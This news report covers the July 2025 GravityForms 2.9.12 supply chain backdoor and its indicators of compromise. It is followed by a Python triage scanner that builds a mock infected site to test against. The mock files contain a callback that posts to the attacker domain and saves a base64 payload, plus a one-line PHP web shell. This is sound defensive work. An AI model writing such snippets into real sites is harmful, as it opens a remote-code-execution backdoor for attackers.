A supply chain attack has compromised the official GravityForms WordPress plugin, allowing attackers to inject malicious code that enables remote code execution on affected websites. The attack, discovered on July 11, 2025, affected one of WordPress's most popular form-building plugins: the malware was distributed in version 2.9.12 directly through the official gravityforms.com domain, reaching users through both manual downloads and Composer installations. Organizations using GravityForms are advised to update immediately to version 2.9.13 or later, run thorough security scans of their WordPress installations, and check for unauthorized administrator accounts and unexpected file modifications.

The breach was first identified by researchers at Patchstack, who received reports of suspicious HTTP requests originating from the GravityForms plugin to an unknown domain, gravityapi.org. That domain was registered on July 8, 2025, only days before the attack was discovered, which points to a deliberately prepared campaign. Patchstack's initial investigation confirmed that the plugin package for version 2.9.12 served from the official channels contained the malware.

The malicious code worked through two functions. The first, update_entry_detail(), collected extensive system information from the infected site, including the WordPress version, active plugins, user counts, and server details, and transmitted it to the attacker-controlled domain. The response from the malicious server contained base64-encoded payloads that the plugin automatically decoded and saved to the site's file system, creating persistent backdoors. The second vector, list_sections(), implemented a backdoor that required a specific API token for access. Together these gave the attackers remote code execution, data exfiltration, and persistent access to compromised sites.

The attack appears to have had a limited window of opportunity. RocketGenius, the developer of GravityForms, quickly removed the malicious code from new downloads and released version 2.9.13 so that users could update without the backdoor present; the company confirmed it is conducting a thorough investigation into how the package was compromised. While the full scope of the attack remains under investigation, preliminary assessments suggest the infection was not widespread, most likely because the malicious version was available for only a short time.

Security firms have published several indicators of compromise: the IP addresses 185.193.89.19 and 193.160.101.6, the dropped files bookmark-canonical.php and block-caching.php, the callback domain gravityapi.org, and the specific API token used by the backdoor.
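The following script is an added example of how a site operator could turn the indicators above into a quick triage check; it is not code from the article, from Patchstack, or from RocketGenius. It walks a WordPress install looking for a GravityForms version older than 2.9.13, the two dropped file names, any PHP file referencing gravityapi.org, and PHP files that define the two function names named in the report, and it scans web-server access-log lines for the two attacker IPs. The standard plugin path (wp-content/plugins/gravityforms/gravityforms.php with a "Version:" header) is the normal WordPress layout; the sample site tree and log lines are constructed for the demonstration, and where the dropped files land on a real compromised site is an assumption here, not something the article states.

```python
"""Triage scan for the GravityForms 2.9.12 supply chain indicators (added example)."""
import collections
import os
import pathlib
import re
import tempfile

FIXED_VERSION = "2.9.13"
IOC_DOMAIN = "gravityapi.org"
IOC_IPS = {"185.193.89.19", "193.160.101.6"}
IOC_FILES = {"bookmark-canonical.php", "block-caching.php"}
# Function names the report associates with the backdoor. Treat as a lower-confidence
# signal: confirm by reading the file rather than acting on the name alone.
IOC_FUNCTIONS = {"update_entry_detail", "list_sections"}

GF_MAIN = pathlib.Path("wp-content/plugins/gravityforms/gravityforms.php")


def version_tuple(version):
    """'2.9.12' -> (2, 9, 12) so versions compare numerically, not lexically."""
    return tuple(int(part) for part in version.split("."))


def scan_wordpress(root):
    """Return (kind, path, detail) findings for one WordPress document root."""
    root = pathlib.Path(root)
    findings = []

    main_file = root / GF_MAIN
    if main_file.is_file():
        header = main_file.read_text(errors="ignore")
        match = re.search(r"^\s*\*?\s*Version:\s*([\d.]+)", header, re.M)
        if match and version_tuple(match.group(1)) < version_tuple(FIXED_VERSION):
            findings.append(("version", str(main_file), match.group(1)))

    for path in root.rglob("*"):
        if not path.is_file():
            continue
        if path.name in IOC_FILES:
            findings.append(("dropped_file", str(path), path.name))
        if path.suffix != ".php":
            continue
        text = path.read_text(errors="ignore")
        if IOC_DOMAIN in text:
            findings.append(("callback_domain", str(path), IOC_DOMAIN))
        for name in IOC_FUNCTIONS:
            if re.search(r"\bfunction\s+" + name + r"\s*\(", text):
                findings.append(("backdoor_function", str(path), name))
    return findings


def scan_access_log(lines):
    """Return the combined-log-format lines whose client IP is an attacker IP."""
    return [line for line in lines if line.split(" ", 1)[0] in IOC_IPS]


def build_sample_site():
    """Create a constructed, deliberately 'infected' site tree and return its root."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="wp-triage-"))
    plugin = root / "wp-content/plugins/gravityforms"
    plugin.mkdir(parents=True)
    (plugin / "gravityforms.php").write_text(
        "<?php\n/*\nPlugin Name: Gravity Forms\nVersion: 2.9.12\n*/\n")
    (plugin / "common.php").write_text(
        "<?php\nfunction update_entry_detail() {\n"
        "  $r = wp_remote_post('https://" + IOC_DOMAIN + "/', array());\n"
        "  file_put_contents(__DIR__ . '/x.php', base64_decode($r));\n}\n")
    (plugin / "settings.php").write_text(
        "<?php\nfunction list_sections() { /* token-gated backdoor */ }\n")
    (plugin / "clean.php").write_text("<?php\nfunction gf_helper() { return 1; }\n")
    # Assumed drop location for the constructed sample; the article does not say where.
    uploads = root / "wp-content/uploads"
    uploads.mkdir(parents=True)
    (uploads / "block-caching.php").write_text("<?php eval(base64_decode($_POST['c']));\n")
    return str(root)


# Constructed access-log lines; only the first two come from the attacker IPs.
SAMPLE_LOG_LINES = [
    '185.193.89.19 - - [11/Jul/2025:10:02:11 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 41',
    '193.160.101.6 - - [11/Jul/2025:10:05:40 +0000] "GET /wp-content/uploads/block-caching.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [11/Jul/2025:10:06:01 +0000] "GET / HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    site = build_sample_site()
    for finding in scan_wordpress(site):
        print(finding)
    for hit in scan_access_log(SAMPLE_LOG_LINES):
        print("attacker IP:", hit)
```

Point scan_wordpress() at the real document root and feed scan_access_log() the access log for the days around July 10 through 12, 2025. A "version" finding alone means the site pulled a vulnerable package and should be treated as potentially compromised even if no dropped file is found, since the base64 payloads written by the callback could carry any name.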
This Cyber News was published on cybersecuritynews.com. Publication date: Sat, 12 Jul 2025 17:25:13 +0000